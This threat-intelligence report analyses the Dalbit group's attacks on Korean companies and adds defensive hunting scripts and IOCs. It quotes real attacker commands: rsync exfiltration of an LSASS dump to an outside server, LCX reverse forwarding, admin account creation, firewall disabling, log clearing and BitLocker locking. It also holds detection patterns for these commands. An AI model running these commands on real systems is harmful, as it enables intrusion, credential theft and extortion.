0. Overview
This report is a continuation of the “Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies” post that was uploaded on August 16, 2022 and follows the group’s activities since that post.
This group has always relied on open-source tools and, because its binaries carry no PDB information, lacked any distinct characteristics that could be used to profile it. Additionally, since the threat actor’s C2 (Command & Control) servers were abused servers of Korean companies, the amount of information that could be collected was limited unless an affected Korean company specifically requested an investigation. However, after the post was uploaded and a portion of the Korean company servers used by the threat actor were blocked, the threat actor began to use a hosting server, “*.m00nlight.top”, as their C2 and download server. Thus, the ASEC team decided to call this group Dalbit (after m00nlight.top), Dalbit being the Korean word for ‘Moonlight’.
This group has had more than 50 confirmed attack attempts on Korean companies since 2022. Most of the attacked companies were small to mid-sized, while a portion were major companies. The team has confirmed that 30% of the infected companies were using a certain Korean groupware solution. Whether this groupware product itself has a vulnerability has not yet been determined, but if a server exposed in this way does have one, companies could be gravely affected through the leakage of confidential information and ransomware activity. Furthermore, the Dalbit group keeps some infected companies as proxies and download servers, later using them as relays to communicate with the threat actor when infiltrating another company.
Therefore, we strongly recommend performing an internal security check if users suspect that they have been attacked by this Dalbit group. The team asks that users send a report to AhnLab and take preemptive measures to prevent secondary harm and potential damage to other companies.
1. Affected Korean Companies (Industry Type)
Listed below are the 50 companies that were confirmed to have been affected since 2022. Companies that have not been clearly confirmed were excluded from this list. It is possible that more companies could have been affected.
The following are the descriptions of each industry type.
- Technology: Companies that handle software or hardware
- Industrial: Manufacturing companies that handle machinery, paint jobs, steel, metals, etc.
- Chemical: Cosmetic, pharmaceutical, and plastic companies
- Construction: Associations or organizations related to construction or construction companies
- Automobile: Automobile-related manufacturing companies
- Semiconductor: Semiconductor-related manufacturing companies
- Education: Educational companies
- Wholesale: Wholesalers
- Media: Printing and media companies
- Food: Food companies
- Shipping: Shipping companies
- Hospitality: Leisure or tourist accommodation companies
- Energy: Energy companies
- Shipbuilding: Shipbuilding companies
- Consulting: Management consulting companies
2. Flow and Characteristics
2.1. Summary Diagram
The above diagram shows the threat actor’s infiltration process into Company B. A brief summary of this flow is in the table below.
Stage | Description |
---|---|
1) Initial Access | The threat actor targets web servers or SQL servers, which they gain access to by exploiting vulnerabilities. They then attempt to control the systems with tools such as WebShell. |
2) Command & Control | |
3) Proxy & Internal Reconnaissance | |
4) Lateral Movement | |
5) Impact | |
The following are major characteristics of the Dalbit group.
2.2. Characteristics of Dalbit
List | Description |
---|---|
Threat Actor’s C2 Servers | Download and C2 (Command & Control) servers are Korean company servers or hosting servers; over half of these servers are exploited Korean company servers; *.m00nlight.top or IP-format addresses are often used for the hosting servers |
Attempts Control Through RDP | Usually attempts RDP access after infection; either a proxy tool or GotoHTTP is used for the RDP connection |
Proxy Tools | Major proxy tools used include FRP, LCX (Htran), NPS, ReGeorg, etc. |
Add User Account | A net command is used to add an account; account credentials: ID “main” / PW “ff0.123456” |
Open-source Tool | Mostly uses publicly available open-source tools; many of the tools are written in Chinese |
Evasion | VMProtect is used to keep hacking tools from being detected; security event logs are deleted |
Extorted Information | User account credentials; email information; screen captures; installed program information |
3. Tools Used and Infiltration Process
3.1. Tools and Malware Used
WebShell | Downloader | Privilege Escalation | Proxy | Internal Reconnaissance |
---|---|---|---|---|
Godzilla, ASPXSpy, AntSword, China Chopper | Certutil (Windows CMD), Bitsadmin (Windows CMD) | BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato, CVE-2018-8639 | FRP, LCX, NPS, ReGeorg | FScan, NbtScan, TCPScan, Goon, Nltest (Windows CMD) |
Lateral Movement | Information Leak and Collection | Backdoor | File Encryption | Evasion |
---|---|---|---|---|
RDP, PsExec, RemCom, Winexec | Wevtutil (Windows CMD), WMI (Windows CMD), ProcDump, Dumpert, EML Extractor (created), Mimikatz, Rsync | CobaltStrike, MetaSploit, BlueShell, Ladon | BitLocker (Windows CMD) | Security log deletion (Windows CMD), Firewall OFF (Windows CMD), Attempts to delete AV products, VMProtect Packing |
Only one tool for leaking emails seems to have been made by the group themselves. The rest are normal Windows programs or tools that can easily be found online.
3.2. Infiltration Process
3.2.1. Initial Infiltration
Their attack targets are assumed to be mainly servers with a specific Korean groupware installed, email servers (Exchange Server), and SQL servers. The threat actor exploited either file upload vulnerabilities or WebLogic vulnerabilities such as CVE-2017-10271 to upload their WebShell. In some cases, the SQL Server command shell (xp_cmdshell) appears to have been used instead.
The most frequently used WebShells are Godzilla, ASPXSpy, AntSword, and China Chopper in that order. Aside from these, several other WebShells were also found.
The installation paths of the WebShells are as follows.
– Job recruitment (File upload vulnerability)
D:\WEB\********\recruit\css1.ashx
D:\WEB\********\recruit\css4.ashx
D:\WEB\********\recruit\commonconf.aspx
...
– File upload vulnerability
– Certain groupware
– Email server (Exchange Server)
– WebLogic
D:\***\wls1035\domains\************\servers\*******\tmp\************\uddiexplorer\gcx62x\war\modifyregistryhelp.jsp
– Tomcat
3.2.2. Download
The threat actor downloads other hacking tools through default Windows programs. Since a WebShell is normally the point of entry, the parent of the download process (apart from intermediate command processes such as cmd.exe) is a web or database server process such as w3wp.exe, java.exe, sqlservr.exe, or tomcat*.exe. The downloaded files include privilege escalation tools, proxy tools, and network scanning tools, all of which the threat actor needs for the next stages. The download commands are as follows.
(Additionally, the full addresses of the Korean companies that have been exploited will not be disclosed.)
1) Certutil
2) Bitsadmin
The hacking tools and malware downloaded by the threat actor were usually found in the following paths.
%ALLUSERSPROFILE%
%SystemDrive%\temp
%SystemRoot%
Therefore, the files in these paths should be checked if users suspect that they have been infiltrated.
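The parent-process relationship described above is the most reliable hunting signal for this stage: certutil.exe or bitsadmin.exe should not be running under a web or database server process. The following is an added example (not AhnLab’s code) that applies that check, together with the account-addition and firewall-off command lines quoted in section 3.2.3, to process-creation records. The record layout (parent chain, image path, command line), the sample records and the download URL placeholder are all constructed assumptions; map the fields to whatever process telemetry is available.

```python
"""Flag process-creation records matching the Dalbit download / privilege
escalation patterns (sections 3.2.2 and 3.2.3).

Added example, not AhnLab's code. Record layout and sample records are
constructed; adapt the field mapping to the telemetry source in use.
"""
import re
from dataclasses import dataclass

# Server processes that end up as the (grand)parent of the downloader when a
# WebShell or xp_cmdshell is the entry point. sqlservr.exe is the SQL Server
# service binary; the "tomcat" prefix matches tomcat*.exe.
SERVER_PARENTS = ("w3wp.exe", "java.exe", "sqlservr.exe", "tomcat")
DOWNLOAD_TOOLS = {"certutil.exe", "bitsadmin.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line patterns taken from the commands quoted in section 3.2.3.
RULES = [
    ("account-add-main", re.compile(r"net\s+user\s+main\b.*?/add", re.I)),
    ("admin-group-add", re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("firewall-off", re.compile(r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I)),
    ("potato-wrapper", re.compile(r'(^|[\\\s])sp\.exe\s+"', re.I)),
]


@dataclass
class ProcRecord:
    ancestors: tuple   # parent chain, nearest parent first, e.g. ("cmd.exe", "w3wp.exe")
    image: str         # full path of the created process
    cmdline: str


def _name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(rec):
    """Return the list of rule names the record triggers (empty if benign)."""
    hits = []
    # Walk past cmd.exe/powershell.exe hops to the process that really launched it.
    real_parents = [_name(a) for a in rec.ancestors if _name(a) not in SHELLS]
    if _name(rec.image) in DOWNLOAD_TOOLS and any(p.startswith(SERVER_PARENTS) for p in real_parents):
        hits.append("download-from-server-process")
    for rule, rx in RULES:
        if rx.search(rec.cmdline):
            hits.append(rule)
    return hits


def hunt(records):
    """Map each triggering record's command line to its rule hits."""
    return {r.cmdline: classify(r) for r in records if classify(r)}


# Constructed sample records (not real telemetry); the URL is a placeholder.
SAMPLES = [
    ProcRecord(("cmd.exe", "w3wp.exe"), r"C:\Windows\System32\certutil.exe",
               r"certutil -urlcache -split -f hxxp://[download-server]/update.exe %ALLUSERSPROFILE%\update.exe"),
    ProcRecord(("cmd.exe", "w3wp.exe"), r"C:\ProgramData\sp.exe",
               'sp.exe "net user main ff0.123456 /add & net localgroup administrators main /add"'),
    ProcRecord(("explorer.exe",), r"C:\Windows\System32\bitsadmin.exe",
               "bitsadmin /list"),
]

if __name__ == "__main__":
    for cmd, hits in hunt(SAMPLES).items():
        print(hits, "<-", cmd)
```

The parent-chain check deliberately skips cmd.exe and powershell.exe hops, because the WebShell usually spawns a command interpreter first; a plain parent-equals-w3wp.exe rule would miss the download.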
3.2.3. Privilege Escalation and Account Addition
For privilege escalation, the threat actor mainly used the Potato family (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) and PoCs for CVE-2018-8639 and CVE-2019-1458 that have been published on GitHub. After privilege escalation, they characteristically add the following account.
The below sp.exe is the SweetPotato tool.
> sp.exe “whoami” (Privilege check)
> sp.exe “netsh advfirewall set allprofiles state off” (Firewall OFF)
> sp.exe “net user main ff0.123456 /add & net localgroup administrators main /add” (Add account)
The point of focus here is the name of the account added by the threat actor. Threat actor accounts with the name “main” have been found in other infiltrated company servers.
Aside from adding accounts, the threat actor would also use stolen admin accounts.
> wmic /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$ process call create “cmd.exe /c c:\temp\s.bat”
3.2.4. Proxy Settings
After infiltrating a server, the threat actor sets up proxy access in order to use RDP. FRP and LCX were the main proxy tools, and ReGeorg, NPS, or RSOCKS was found at some companies. At one infiltrated company, multiple proxy tools including FRP and LCX were found on a single host. Multiple FRP configuration files (.ini) were also discovered in cases where internal propagation had occurred; we believe the threat actor installs additional FRP instances with separate configuration files when an accessible PC has a lot to offer. Furthermore, the LCX used by this group has the same features as the open-source LCX, but it is not the build uploaded to GitHub, meaning a binary privately compiled by a Chinese developer was used.
Proxy tools like FRP and LCX differ in terms of forwarding methods and supported protocols. However, since their differences, actual infection cases, recreation, and network packets have all been covered in the TI report, “Analysis Report on Attack Cases Exploiting Various Remote Control Tools,” they will not be reiterated in this post.
1) FRP(FAST REVERSE PROXY)
FRP configuration files (.ini) were found in all servers and PC devices infiltrated by this group. The following is an actual case of an infiltrated company.
In particular, the Dalbit group usually communicated over the Socks5 protocol. Socks5 sits at the session layer (layer 5) of the 7-layer OSI model, between the transport and application layers, so a single Socks5 proxy can relay arbitrary application traffic such as HTTP, FTP, and RDP. Therefore, with a proxy client that supports Socks5, such as Proxifier, the threat actor can reach RDP through the proxy, and if a connection can be established to an internal PC, lateral movement becomes possible as well. Configuring FRP as a Socks5 proxy thus gives the threat actor more freedom, since no further configuration changes are needed to handle different kinds of traffic.
The following are FRP filenames and commands used by the threat actor. The list is in a descending order from most to least used.
- FRP filenames
update.exe, debug.exe, main.exe, info.exe, Agent.exe, frpc.exe, test.exe, zabbix.exe, winh32.exe, cmd.exe
- FRP commands
> update.exe -c frpc.ini
> update.exe -c 8080.ini
> update.exe -c 8.ini
> info.zip -c frpc__8083.ini
> debug.exe -c debug.ini
> debug.exe -c debug.log
> debug.exe -c debug.txt
> frpc.exe -c frpc__2381.ini
> cmd.exe /c c:temp****tempfrpc.ini
…
At certain companies, FRP was registered in the task scheduler (schtasks) under the name “debug” to maintain persistence. As shown in Table 12, the team also confirmed that the registered task was executed.
> schtasks /tn debug /run
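The FRP configuration files themselves are a good hunting artifact. The following added example (not AhnLab’s code and not part of the frp project) parses frpc-style configuration files with Python’s configparser and reports the server address, any section with `plugin = socks5` (the Socks5 setup described above), and any TCP forward whose `local_port` is 3389. It reads every file under a directory rather than only *.ini files, because the command list above shows configurations named debug.log and debug.txt. The key names are those of the frp ini format; the sample configuration, including the 203.0.113.10 address, is constructed.

```python
"""Find frpc-style configuration files and summarise what they expose
(section 3.2.4).

Added example, not AhnLab's or the frp project's code. SAMPLE_INI and the
files written by demo() are constructed.
"""
import configparser
import os
import tempfile

# Constructed sample: one socks5 plugin section and one RDP port forward.
SAMPLE_INI = """[common]
server_addr = 203.0.113.10
server_port = 7000
token = example-token

[plugin_socks5]
type = tcp
remote_port = 6000
plugin = socks5

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 2381
"""


def parse_frpc_ini(text):
    """Return a summary dict if text looks like an frpc config, else None."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None          # not ini-shaped at all (binary, log text, ...)
    if "common" not in cp or not cp.has_option("common", "server_addr"):
        return None          # ini file, but not an frpc client config
    common = cp["common"]
    result = {
        "server": f"{common['server_addr']}:{common.get('server_port', '7000')}",
        "socks5": [], "rdp_forward": [], "other": [],
    }
    for name in cp.sections():
        if name == "common":
            continue
        sec = cp[name]
        if sec.get("plugin", "").lower() == "socks5":
            result["socks5"].append(name)
        elif sec.get("local_port") == "3389":
            result["rdp_forward"].append(name)
        else:
            result["other"].append(name)
    return result


def scan_tree(root):
    """Walk root and return {path: summary} for every frpc-style config found."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as f:
                    text = f.read(65536)   # configs are tiny; cap the read
            except OSError:
                continue
            parsed = parse_frpc_ini(text)
            if parsed:
                findings[path] = parsed
    return findings


def demo():
    """Write a config disguised as debug.log plus a benign file; list the hits."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "debug.log"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_INI)
        with open(os.path.join(d, "readme.txt"), "w", encoding="utf-8") as f:
            f.write("nothing to see here\n")
        return sorted(os.path.basename(p) for p in scan_tree(d))


if __name__ == "__main__":
    import sys
    for path, summary in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, summary)
```

Run it against the download paths listed in section 3.2.2 (%ALLUSERSPROFILE%, %SystemDrive%\temp, %SystemRoot%); the server address in any hit is the value to compare against the C2 list in section 5.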
2) LCX(HTRAN)
Dalbit used an LCX (Htran) binary compiled by a certain Chinese person. This has the same features as the existing binary, but it also includes the nickname of the binary creator.
We can confirm through this that the nickname of the person who had created the binary is “折羽鸿鹄” (QQ:56345566). It is highly unlikely that this developer is the threat actor in question; however, since this binary cannot be downloaded through a simple search online, it is assumed that the threat actor has a connection to China.
The installed filenames and executables are as follows:
- LCX filenames
lcx3.exe, lcx.exe, update.exe
- LCX commands
> update.exe -slave 1.246.***.*** 110 127.0.0.1 3389
> lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389
…
The above LCX C2 is a Korean company server and has been concealed.
3.2.5. Internal Reconnaissance
Fscan and NBTScan were commonly used for network scans, and the use of TCPScan and Goon has also been confirmed in some cases.
Goon is a network scanning tool written in Golang that not only performs basic port scanning but also scans for Tomcat, MSSQL, and MySQL accounts. This tool, too, was made by Chinese developers.
3.2.6. Information Extortion
The information stolen is usually an LSASS dump and the EML files of certain accounts. Depending on the company, it has also been confirmed that installed programs were enumerated with a WMIC command, or that screenshots of the affected PC were sent to the threat actor’s server at regular intervals.
1) Credential Extraction (LSASS Dump)
Depending on the target, the threat actor sometimes chose not to install Mimikatz and instead extracted credentials by dumping the lsass.exe process. Credentials can then be recovered offline from the dump file with tools such as Mimikatz or Pypykatz. A detailed explanation of Mimikatz can be found in the TI report, “Analysis Report on Internal Web Spreading Methods Using Mimikatz“.
The following method is how the threat actor stole credentials without Mimikatz.
1-1) Dumpert
Open-source Dumpert is an API hooking evasion tool that operates according to the target OS system and uses the MiniDumpWriteDump() API to dump the lsass.exe process. The threat actor modified the code to change the path of the dump file and remove features like log output.
The above figure shows that the two versions are the same aside from the different paths and the removal of the output string.
The following table lists all of the “%SystemRoot%\temp” dump file paths found so far.
%SystemRoot%\temp\duhgghmpert.dmp
%SystemRoot%\temp\dumpert.dmp
%SystemRoot%\temp\tarko.dmp
%SystemRoot%\temp\lsa.txt
…
1-2) Procdump
Procdump is a normal utility program provided by Microsoft and offers the process dump feature. The threat actor performed a dump like the one in Figure 8 with this tool.
Afterward, the threat actor used a tool called Rsync (Remote Sync) to send the dump file to their own server. The following is an actual example of information theft attempted by the threat actor.
> svchost.exe -accepteula -ma lsass.exe web_log.dmp
> rsync -avz --port 443 web_log.zip test@205.185.122[.]95::share/web_log.zip
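Both Dumpert (via MiniDumpWriteDump) and ProcDump write a minidump, and the paths above show the threat actor renaming the result (lsa.txt, web_log.dmp), so a filename-based search is unreliable. The following added example (not AhnLab’s code) identifies minidumps by content instead: every minidump begins with the ASCII signature “MDMP” followed by a 4-byte Version field whose low word is MINIDUMP_VERSION (0xA793). The search roots mirror the paths from sections 3.2.2 and 3.2.6; the files written by demo() are constructed.

```python
"""Locate minidump files by content rather than by name (section 3.2.6).

Added example, not AhnLab's code. The sample files written by demo() are
constructed; default_roots() only resolves on Windows.
"""
import os
import struct
import tempfile

MINIDUMP_SIGNATURE = b"MDMP"   # MINIDUMP_HEADER.Signature
MINIDUMP_VERSION = 0xA793      # low word of MINIDUMP_HEADER.Version


def is_minidump(path):
    """True if the file begins with a MINIDUMP_HEADER signature and version."""
    try:
        with open(path, "rb") as f:
            header = f.read(8)
    except OSError:
        return False
    if len(header) < 8 or header[:4] != MINIDUMP_SIGNATURE:
        return False
    version = struct.unpack("<I", header[4:8])[0]
    return (version & 0xFFFF) == MINIDUMP_VERSION


def find_minidumps(roots):
    """Walk the given directories and return (path, size) for every minidump."""
    hits = []
    for root in roots:
        if not os.path.isdir(root):
            continue
        for dirpath, _, files in os.walk(root):
            for fn in files:
                p = os.path.join(dirpath, fn)
                if is_minidump(p):
                    hits.append((p, os.path.getsize(p)))
    return hits


def default_roots():
    # Paths from sections 3.2.2 and 3.2.6 where the threat actor's tools and
    # dumps were found; the environment variables only resolve on Windows.
    return [os.path.expandvars(p) for p in
            (r"%SystemRoot%\temp", r"%SystemDrive%\temp", r"%ALLUSERSPROFILE%")]


def demo():
    """Write one constructed dump header and one text file; list the dump."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "lsa.txt"), "wb") as f:
            # signature + version (high word is implementation-specific) + padding
            f.write(MINIDUMP_SIGNATURE + struct.pack("<I", 0x0002A793) + b"\0" * 64)
        with open(os.path.join(d, "readme.txt"), "wb") as f:
            f.write(b"plain text, not a dump\n")
        return [os.path.basename(p) for p, _ in find_minidumps([d])]


if __name__ == "__main__":
    for path, size in find_minidumps(default_roots()):
        print(f"{size:>12} {path}")
```

A hit on a file whose name does not end in .dmp, or that sits in %SystemRoot%\temp, deserves the same urgency as the dump itself: it is the LSASS memory of that host, and the rsync line above shows it being sent out over port 443.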
2) Email Extraction
This sample is an email extraction tool developed with Golang and presumably the only known tool developed by the threat actor themselves. This tool offers the ability to target a company’s Exchange email server and extract a specific account’s email with EWS (Exchange Web Service) as an EML file. Arguments include the Exchange server address, account name, NTLM password hash of said account, date and time, etc. When launched, the tool extracts every email from the mailboxes of the target account according to the time received as an argument and saves them as an EML file.
For reference, the PDB information of this binary is “fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff”and is meaningless.
3) Screen Leak
The threat actor sent screenshots from certain PCs to their own server. Although the binary that takes the screenshots has not been found yet, the threat actor’s server receiving the infected PC’s screenshots has been identified. An infiltrated PC at one company sent a screenshot every 5-10 seconds.
Outgoing server of threat actor’s screenshots: hxxp://91.217.139[.]117:8080/1.bat |
Only images were sent; the PC was not controlled remotely through this channel and no audio was transmitted.
Also, the threat actor’s server (91.217.139[.]117) where the screenshots were being sent was also being used as a download server for another company.
4) Lookup Installed Programs and Login Information
The threat actor used a WMIC command to check installed programs.
> wmic product get name,version |
Furthermore, the domain account logon information behind certain event IDs in the Security event log was collected. The resulting file is saved as c:\temp\EvtLogon.dat.
Event ID | Meaning |
4624 | Login successful |
4768 | Kerberos authentication request |
4776 | NTLM authentication attempt |
> wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:\temp\EvtLogon.dat
3.2.7. File Encryption
Details about this matter have been covered in a past blog post. The threat actor used BitLocker, a Windows utility, to encrypt certain drives and demand ransoms. Currently, more affected companies are still being found.
- BitLocker commands
> “C:\Windows\System32\BitLockerWizardElev.exe” F: T
> manage-bde -lock -ForceDismount F:
> manage-bde -lock -ForceDismount e:
> “c:\windows\system32\bitlockerwizardelev.exe” e: t
> “c:\windows\system32\bitlockerwizardelev.exe” f: u
Figure 13 is the ransom note used by the threat actor. The threat actor used anonymous mailing services such as startmail.com and onionmail.com.
The command assumed to be for downloading the ransom note is as follows.
3.2.8. Evasion
1) VMPROTECT PACKING
When an uploaded binary was detected, the threat actor packed it with VMProtect to try to avoid detection.
– Privilege escalation tools
%ALLUSERSPROFILE%\badpotatonet4.exe
%ALLUSERSPROFILE%\BadPotatoNet4.vmp.exe
%ALLUSERSPROFILE%\SweetPotato.exe
%ALLUSERSPROFILE%\SweetPotato.vmp.exe
%ALLUSERSPROFILE%\jc.vmp.exe
%SystemDrive%\nia\juicypotato.vmp1.exe
%SystemDrive%\nia\juicypotato.vmp.exe
…
– Proxy tools
2) Windows Event Log Deletion Using Wevtutil
Removal of security event logs
> cmd.exe /c wevtutil cl security
Removal of application logs
> cmd.exe wevtutil.exe el
> cmd.exe wevtutil.exe cl “application”
3) Firewall OFF
> sp.exe “netsh advfirewall set allprofiles state off”
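The Security log the threat actor queried in section 3.2.6 also records their own actions from sections 3.2.3 and 3.2.8: event 4720 (a user account was created), 4732 (a member was added to a security-enabled local group) and 1102 (the audit log was cleared, which survives as the first record of the emptied log). The following added example (not AhnLab’s code) parses exported text records for those three events and ties the SID of a newly created “main” account to its later addition to Administrators. SAMPLE_LOG is constructed in the shape of `wevtutil qe security /f:text` output, which is an assumption about the exact layout; records are expected oldest first, i.e. exported without /rd:true.

```python
"""Hunt exported Security log text for the attacker-side events of sections
3.2.3 and 3.2.8: 4720 (account created), 4732 (added to local group) and
1102 (audit log cleared).

Added example, not AhnLab's code. SAMPLE_LOG is constructed; the record layout
is an assumption about wevtutil's /f:text output.
"""
import re

SAMPLE_LOG = """Event[0]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Event ID: 4720
  Task: User Account Management
  Description:
A user account was created.

New Account:
\tSecurity ID:\t\tS-1-5-21-0-0-0-1001
\tAccount Name:\t\tmain
\tAccount Domain:\t\tWEBSRV01

Event[1]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Event ID: 4732
  Task: Security Group Management
  Description:
A member was added to a security-enabled local group.

Member:
\tSecurity ID:\t\tS-1-5-21-0-0-0-1001
\tAccount Name:\t\t-

Group:
\tSecurity ID:\t\tS-1-5-32-544
\tGroup Name:\t\tAdministrators

Event[2]:
  Log Name: Security
  Source: Microsoft-Windows-Eventlog
  Event ID: 1102
  Task: Log clear
  Description:
The audit log was cleared.
Subject:
\tAccount Name:\t\tmain

Event[3]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Event ID: 4624
  Task: Logon
  Description:
An account was successfully logged on.
"""


def split_events(text):
    """Return (event_id, body) for each 'Event[n]:' record in the export."""
    events = []
    for chunk in re.split(r"^Event\[\d+\]:\s*$", text, flags=re.M):
        m = re.search(r"Event ID:\s*(\d+)", chunk)
        if m:
            events.append((int(m.group(1)), chunk))
    return events


def hunt(text, watch_names=("main",)):
    """Return (rule, detail) findings; watch_names are account names to flag."""
    findings = []
    created = {}   # SID -> account name, from 4720 events seen so far
    for eid, body in split_events(text):
        if eid == 4720:
            m = re.search(r"New Account:.*?Security ID:\s*(\S+).*?Account Name:\s*(\S+)", body, re.S)
            if m:
                sid, name = m.groups()
                created[sid] = name
                if name.lower() in watch_names:
                    findings.append(("suspicious-account-created", name))
        elif eid == 4732:
            grp = re.search(r"Group:.*?Group Name:\s*(\S+)", body, re.S)
            mem = re.search(r"Member:.*?Security ID:\s*(\S+)", body, re.S)
            if grp and mem and grp.group(1).lower() == "administrators":
                # 4732 carries only the member's SID; resolve it via the 4720 seen earlier
                findings.append(("added-to-administrators", created.get(mem.group(1), mem.group(1))))
        elif eid == 1102:
            m = re.search(r"Subject:.*?Account Name:\s*(\S+)", body, re.S)
            findings.append(("security-log-cleared", m.group(1) if m else "?"))
    return findings


if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_LOG):
        print(f"{rule:30} {detail}")
```

Because `wevtutil cl security` removes everything before it, a 1102 with nothing older than it in the log is itself the finding; the 4720/4732 pair will then only be available from a forwarded copy of the log, which is the practical argument for forwarding Security events off the web server.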
4. Conclusion
The Dalbit hacking group attacked vulnerable Korean company servers, and cases continue to be reported not only from small and mid-sized businesses but also from some large companies. In particular, 30% of the affected companies were found to be using a certain Korean groupware product. Moreover, this group uses publicly available tools throughout, from the WebShell used in the early stages to the ransomware used at the end. Among these tools are a proxy tool assumed to have been obtained from a Chinese community, a tool with Chinese documentation, and a Chinese tool not mentioned in this post. Considering their frequent use of Chinese tools, it can be assumed that the threat actor has at least a partial connection with China.
If a server admin suspects that their system has been infected, they are advised to check the IOCs below, along with the download paths and the account name (“main”) the threat actor often uses, as described above. If the suspicion is confirmed, it is advised to report the situation to AhnLab immediately in order to minimize additional harm. Furthermore, admins should prevent vulnerability attacks by keeping their servers updated with the latest patches; maintenance is especially needed for servers that are exposed externally but not actively managed.
5. IOC
For reference, the IP addresses of Korean company servers abused by the threat actor will not be disclosed on the ASEC blog.
- Mitre Attack
Tactic | Technique |
---|---|
Execution | Command and Scripting Interpreter (T1059); Windows Management Instrumentation (T1047); System Service (T1569) |
Persistence | Scheduled Task/Job (T1053); Create Account (T1136); Server Software Component (T1505); Account Manipulation (T1098) |
Privilege Escalation | Access Token Manipulation (T1134); Exploitation for Privilege Escalation (T1068) |
Credential Access | OS Credential Dumping (T1003) |
Discovery | Remote System Discovery (T1018); Network Service Discovery (T1046) |
Defense Evasion | Impair Defenses (T1562); Indicator Removal (T1070) |
Lateral Movement | Remote Services (T1021); Lateral Tool Transfer (T1570) |
Collection | Data from Local System (T1005); Account Discovery: Email Account (T1087.003); Email Collection (T1114); Screen Capture (T1113) |
Exfiltration | Exfiltration Over Web Service (T1567) |
Command and Control | Proxy (T1090); Ingress Tool Transfer (T1105) |
Impact | Data Encrypted for Impact (T1486) |
Resource Development | Stage Capabilities: Upload Malware (T1608.001) |
- Detection Names
– WebShell/Script.Generic (2020.12.11.09)
– WebShell/ASP.ASpy.S1361 (2021.02.02.03)
– WebShell/ASP.Generic.S1855 (2022.06.22.03)
– WebShell/ASP.Small.S1378 (2021.02.24.02)
– WebShell/JSP.Godzilla.S1719 (2021.12.03.00)
– WebShell/JSP.Chopper.SC183868 (2022.10.15.01)
– WebShell/JSP.Generic.S1363 (2021.01.27.03)
– Backdoor/Script.Backdoor (2015.01.04.00)
– WebShell/JSP.Generic.S1956 (2022.11.14.00)
– Trojan/Script.Frpc (2022.12.17.00)
– JS/Webshell (2011.08.08.03)
– HackTool/Win.Fscan.C5334550 (2023.01.27.00)
– HackTool/Win.Fscan.C5230904 (2022.10.08.00)
– HackTool/Win.Fscan.R5229026 (2022.10.07.03)
– Trojan/JS.Agent (2022.03.16.02)
– Unwanted/Win32.TCPScan.R33304 (2012.08.17.00)
– HackTool/Win.Scanner.C5220929 (2022.08.09.02)
– HackTool/Win.SweetPotato.R506105 (2022.08.04.01)
– Exploit/Win.BadPotato.R508814 (2022.08.04.01)
– HackTool/Win.JuicyPotato.R509932 (2022.08.09.03)
– HackTool/Win.JuicyPotato.C2716248 (2022.08.09.00)
– Exploit/Win.JuicyPotato.C425839 (2022.08.04.01)
– Exploit/Win.SweetPotato.C4093454 (2022.08.04.01)
– Trojan/Win.Escalation.R524707 (2022.10.04.02)
– Trojan/Win.Generic.R457163 (2021.12.09.01)
– HackTool/Win64.Cve-2019-1458.R345589 (2020.07.22.06)
– Malware/Win64.Generic.C3164061 (2019.04.20.01)
– Malware/Win64.Generic.C3628819 (2019.12.11.01)
– Exploit/Win.Agent.C4448815 (2021.05.03.03)
– Trojan/Win.Generic.C4963786 (2022.02.11.04)
– Trojan/Win.Exploit.C4997833 (2022.03.08.01)
– Exploit/Win.Agent.C5224192 (2022.08.17.00)
– Exploit/Win.Agent.C5224193 (2022.08.17.00)
– Trojan/Win32.RL_Mimikatz.R290617 (2019.09.09.01)
– Trojan/Win32.Mimikatz.R262842 (2019.04.06.00)
– Trojan/Win.Swrort.R450012 (2021.11.14.01)
– HackTool/Win.Lsassdump.R524859 (2022.10.05.00)
– HackTool/Win.ProxyVenom.C5280699 (2022.10.15.01)
– Unwanted/Win.Frpc.C5222534 (2022.08.13.01)
– Unwanted/Win.Frpc.C5218508 (2022.08.03.03)
– Unwanted/Win.Frpc.C5218510 (2022.08.03.03)
– Unwanted/Win.Frpc.C5218513 (2022.08.03.03)
– HackTool/Win.Frpc.5222544 (2022.08.13.01)
– HackTool/Win.Frp.C4959080 (2022.02.08.02)
– HackTool/Win.Frp.C5224195 (2022.08.17.00)
– Unwanted/Win.Frpc.C5162558 (2022.07.26.03)
– Malware/Win.Generic.C5173495 (2022.06.18.00)
– HackTool/Win.LCX.C5192157 (2022.07.04.02)
– HackTool/Win.LCX.R432995 (2023.01.06.01)
– HackTool/Win.Rsocx.C5280341 (2022.10.15.00)
– Backdoor/Win.BlueShell.C5272202 (2022.10.05.00)
– Trojan/Win.BlueShell.C5280704 (2022.10.15.01)
– Backdoor/Win.CobaltStrike.R360995 (2022.09.20.00)
– Unwanted/Win.Extractor.C5266516 (2022.10.01.00)
– Trojan/Win.RemCom.R237878 (2023.01.07.00)
[IOC]
- MD5 (Excluding normal files)
– WebShell
0359a857a22c8e93bc43caea07d07e23
85a6e4448f4e5be1aa135861a2c35d35
4fc81fd5ac488b677a4c0ce5c272ffe3
c0452b18695644134a1e38af0e974172
6b4c7ea91d5696369dd0a848586f0b28
96b23ff19a945fad77dd4dd6d166faaa
